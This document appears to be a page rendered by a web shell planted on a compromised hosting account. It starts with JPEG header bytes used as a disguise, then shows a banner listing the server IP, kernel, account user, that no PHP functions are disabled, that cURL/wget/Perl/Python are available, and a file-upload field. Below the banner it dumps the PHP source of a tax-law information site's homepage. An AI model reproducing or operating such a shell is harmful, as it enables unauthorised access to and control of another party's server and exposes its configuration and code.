ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.73 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/taxhyuvu/www/ |
Upload File : |
<?php include "head.php"; include "admin/db.php"; ?> <!DOCTYPE html> <html lang="en"> <head> <title>Taxhelpline</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet"> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js"></script> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Libre+Baskerville:wght@700&display=swap" rel="stylesheet"> --> </head> <style> .head{width: 100%;height: 200px; background-color: #ebebebf7;} .head img{width: 300px;} .img1st{margin: 0% 37%; padding-top: 62px;} .img1st h4{ padding: 0px; font-size: 1.0rem !important; margin: 0px; font-family: 'Jockey One'; color: #0299A9; font-weight: 800;} .boxx{background-color: #049cae; border:2px solid #049cae ; background-image: url(pngwing.com.png); display: flex; justify-content: center; align-items: center; transition: 0.5s;} .boxx:hover{ background: #049cae14; border: 2px solid #929a9d;transition: 0.5s; } .boxx:hover h1{ color: #929a9d; transition: 0.5s;} .boxx1{border:2px solid #929a9d; background-color: #929a9d;background-image: url(pngwing.com.png); background-repeat: no-repeat; background-size: 70%; display: flex; justify-content: center; align-items: center; transition: 0.5s;} .boxx1:hover{background: #e2e2e2; border: 2px solid #049cae; transition: 0.5s;} .boxx1:hover h1{color: #049cae;transition: 0.5s;} .boxx,.boxx1{width: 50 %;height: 105px;margin-top: 5%;transition: 0.5s;} .boxx h1{text-align: center;font-family: 'Libre Baskerville', serif; color: white; transition: 0.5s;} .boxx1 h1{text-align: center;font-family: 'Libre Baskerville', serif; color: white;transition: 0.5s;} a{ text-decoration: none;} .black1{display: flex; justify-content: center; align-items: center; width:100%;height:250px; background: #898989; margin: 10px;border-radius: 10px; animation-name: example1; animation-duration: 4s; } .black{display: flex; justify-content: center; align-items: center; width:100%;height:250px; background: #0097a2; margin: 10px;border-radius: 10px; animation-name: example; animation-duration: 4s; } .black img{width:30%;} .black h1,.black1 h1{display: flex; align-items: center; justify-content: center; font-family: math; font-size: 50px; color: white; font-weight: 800; } { width: 100px; height: 100px; background-color: red; animation-name: example; animation-duration: 2s; } @keyframes example { from {margin-left: 500px; opacity: 0.0;} to { margin-left: 0px;opacity: 1.0;} } @keyframes example1 { from {margin-right: 500px !important; opacity: 0.0;} to { margin-right: 0px !important;opacity: 1.0;} } </style> <!-- <link rel="stylesheet" href="path/to/font-awesome/css/font-awesome.min.css"> --> <div class="container" > <div class="row" id="invoice"> <div class="col-md-4"><div class="black1"><h1>Customs</h1></div></div> <div class="col-md-4"><div class="black"><h1>Income Tax</h1></div></div> <div class="col-md-4"><div class="black1"><h1>Sales Tax</h1></div></div> <div class="col-md-6"><div class="black"><h1>Federal Excise</h1></div></div> <div class="col-md-6"><div class="black"><h1>Sales Tax on Services </h1></div></div> </div></div> <body> <style> .blue{border: 1px solid #1d939d; padding: 11px; /*width: 100%;*/ /*height: 200px;*/ margin-bottom: 20px; margin-top: 20px; color: #31363a; } a:hover{color: rgb(50 54 58) !important; } .blue h3{display: inline;font-weight: 800;font-size: 24px;} .asan{font-family: math; font-size: 18px; color: white;} .blue a{ color: #1e4045 !important; transition: all .3s ease;} .blue a:hover{ color: #000000 !important; transition: all .3s ease;} .blue:hover { /* transform: translateY(-2px); */ box-shadow: 0 10px 20px 0 rgba(5,19,79,.09); background: var(--bs-white)!important; /* filter:drop-shadow(0px 5px 5px rgba(0, 0, 0, 0.3)); */ transition: all .3s ease; } </style> <hr> <div class="container new"> <div class="row asan"> <div class="col-md-4"><div class="blue"> <h3>Case Laws</h3><img src="news-ticker.gif" alt="" style="margin-left: 10px; display: inline; width: 53px;"> <hr> <ol> <?php $has="SELECT * FROM `cases`ORDER BY `ID` Desc LIMIT 0,6"; $data01=mysqli_query($con,$has); foreach ($data01 as $P ) { ?> <a href="viewreport?id=<?php echo $P['ID'] ?>"> <li style="text-align:justify;"> <?php echo $P['Court'] ?>| <?php echo $P['Year'] ?> | <b><?php echo $P['Topic'] ?></b> | <?php echo $P['Ref'] ?> <b> [<?php echo $P['Judgment'] ?>]</b> </li></a> <hr> <?php }?> </ol> </div></div> <div class="col-md-4"><div class="blue"><h3>Judgments</h3><img src="news-ticker.gif" alt="" style="margin-left: 10px; display: inline; width: 53px;"><hr> <ol> <?php $has="SELECT * FROM `judgments`ORDER BY `ID` Desc LIMIT 0,6"; $data01=mysqli_query($con,$has); foreach ($data01 as $P ) { ?> <a href="viewjudgment?id=<?php echo $P['ID'] ?>"> <li style="text-align:justify;"> <?php echo $P['Court'] ?> | <?php echo $P['Year'] ?> | <?php echo $P['Ref'] ?> <b> [<?php echo $P['PTD'] ?>]</b> </li></a> <hr> <?php }?> </ol> </div></div> <div class="col-md-4"><div class="blue"><h3>SROs</h3><img src="news-ticker.gif" alt="" style="margin-left: 10px; display: inline; width: 53px;"><hr> <ol> <?php $has="SELECT * FROM `sro`ORDER BY `ID` Desc LIMIT 0,6"; $data01=mysqli_query($con,$has); foreach ($data01 as $P ) { ?> <a href="sros?tax=<?php echo $P['Catag'] ?>"> <li style="text-align:justify;"><?php echo $P['sron'] ?> | <?php echo $P['sub'] ?></a> </li><hr> <?php } ?> </ol> </div></div> </div> </div> <hr> <style> .section-title { text-align: center; padding-bottom: 25px; } .section-title h2 { font-size: 45px; font-weight: 900; margin-top: 3.5%; position: relative; color: #2a939c; font-family: math; } .asif{color: black; margin-top: 0%; padding-bottom: 20px; padding-top: 20px; display:flex; justify-content: center; align-items: center; } .asd { border-color: hsla(0,0%,40%,.1)!important; border-radius:1rem!important; } .asd:hover { transform: translateY(-2px); box-shadow: 0 10px 20px 0 rgba(5,19,79,.09); background: var(--bs-white)!important; /* filter:drop-shadow(0px 5px 5px rgba(0, 0, 0, 0.3)); */ transition: all .3s ease; } </style> <div class="section-title"> <h2>Director Message</h2> </div> <div class="container"> <center> <div class="card asd" > <div class="row asif"> <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" style="color:black;"> <center><img src="e.png" class="image-fluid" style=" width:250px; height:300px; "></center> </div> <div class="col-xl-9 col-lg-8 col-md-12 col-sm-12" style=""> <h1 style="font-size: 35px;font-family:math; text-align: justify;font-weight: bolder;"><b>S.M. Ramzan Gillani</b></h1> <h5 style=" font-size: 20px;font-family:math; text-align: justify;"><b>Advocate High Court (MA , LL.B & LL.M)</b></h5> <center> <h6 style="font-family:Math;font-size: 19px;line-height: 28px;color:#3e4447;text-align: justify;padding-right: 5%; "> We have launched website www.taxhelplines.com.pk and www.taxhelplines.pk. They are highly informative and useful websites for all the concerned people; Tax Managers, Tax Collectors Tax Consultants, Chartered Accountants, Lawyers and Students of Taxation. We have given preference to case laws and important paras or concluding paras of judgments side by side the detailed judgments, illustrations and other relevant information. We may continuously upload data day to day on our websites. The taxhelpline is very helpful for taxpayers and tax consultants. We are continuously working on research for the facilitation of trade and industries and solutions of their day to day tax problems. www.taxhelplines.com.pk and www.taxhelplines.pk is a climax of our achievements for taxpayers. You may learn more taxation at our website. We hope you will benefits of our research and experience. We shall welcome your suggestions for further improvement. You may also share authenticated information and tax materials. </center> </div> </div></div></div></center></div> <br> <?php include("footer.php"); ?>